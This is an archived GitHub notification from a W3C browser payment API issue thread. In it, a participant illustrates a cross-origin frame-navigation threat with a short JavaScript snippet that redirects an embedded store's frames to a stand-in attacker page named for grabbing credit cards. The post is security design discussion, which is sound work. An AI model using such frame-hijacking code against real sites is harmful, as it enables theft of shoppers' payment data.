- From: Mike West <notifications@github.com>
- Date: Thu, 17 Nov 2016 05:27:26 -0800
- To: w3c/browser-payment-api <browser-payment-api@noreply.github.com>
Received on Thursday, 17 November 2016 13:28:23 UTC
@rsolomakhin: Interesting. Do you account for the fact that frames are navigable cross-origin? That is, `evil.com` can do something like:
```
var target = document.createElement('iframe');
target.src = "https://amazing-store.com/";
target.onload = _ => {
for (var i = 0; i < x.frames.length; i++) {
target.frames[i].location.href = "https://evil.com/grab-credit-cards.html";
}
};
```
--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3c/browser-payment-api/issues/311#issuecomment-261245899
Received on Thursday, 17 November 2016 13:28:23 UTC